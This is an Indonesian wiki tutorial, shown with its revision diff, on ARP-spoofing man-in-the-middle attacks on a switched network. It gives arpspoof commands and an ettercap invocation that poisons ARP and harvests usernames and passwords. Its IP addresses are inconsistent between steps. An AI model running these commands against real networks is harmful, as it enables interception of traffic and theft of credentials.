Difference between revisions of "MITM: aprspoof switch"

From OnnoWiki
Jump to navigation Jump to search
Line 12: Line 12:
 
==Asumsi Jaringa==
 
==Asumsi Jaringa==
  
  192.168.0.1 --- SWITCH ---- 192.168.0.2
+
  192.168.0.106 --- SWITCH ---- 192.168.0.100
 
                     |
 
                     |
 
                     |
 
                     |
 
               192.168.0.3
 
               192.168.0.3
  
komunikasi antara 192.168.0.1 dan 192.168.0.2 melalui swicth akibatnya 192.168.03 tidak bisa melihat packet yang lewat.
+
komunikasi antara 192.168.0.100 dan 192.168.0.106 melalui swicth akibatnya 192.168.03 tidak bisa melihat packet yang lewat.
 
Attacker 192.168.0.3 harus melakukan spoofing.
 
Attacker 192.168.0.3 harus melakukan spoofing.
  

Revision as of 08:48, 4 April 2017

sumber: https://www.irongeek.com/i.php?page=security/arpspoof

Untuk melakukan arpspoofing pada switch.

Set IP forwarding

Set IP fowarding

echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -w net.inet.ip.forwarding=1

Asumsi Jaringa

192.168.0.106 --- SWITCH ---- 192.168.0.100
                   |
                   |
             192.168.0.3

komunikasi antara 192.168.0.100 dan 192.168.0.106 melalui swicth akibatnya 192.168.03 tidak bisa melihat packet yang lewat. Attacker 192.168.0.3 harus melakukan spoofing.

Aktifkan arpspoofing

attacker melakukan spoofing

arpspoof -t 192.168.0.100 192.168.0.106 & >/dev/null
arpspoof -t 192.168.0.106 192.168.0.100 & >/dev/null


Bagian "& >/dev/nul" di ketik agar mudah menjalankan di satu terminal.

Untuk men-stop arpspoofing,

killall arpspoof

Sadap dengan Ettercap

sadap komunikasi antara 2 mesin,

ettercap -NaC 192.168.0.1 192.168.0.2

Dimana

  • N - non-interactive
  • a - arppoison
  • C - parsing username & password

yang menarik dari ettercap dia juga akan membuka komunikasi SSL yang terenkripsi.

Untuk menggunakan ettercap untuk sniffing, dapat menggunakan

ettercap -J


Referensi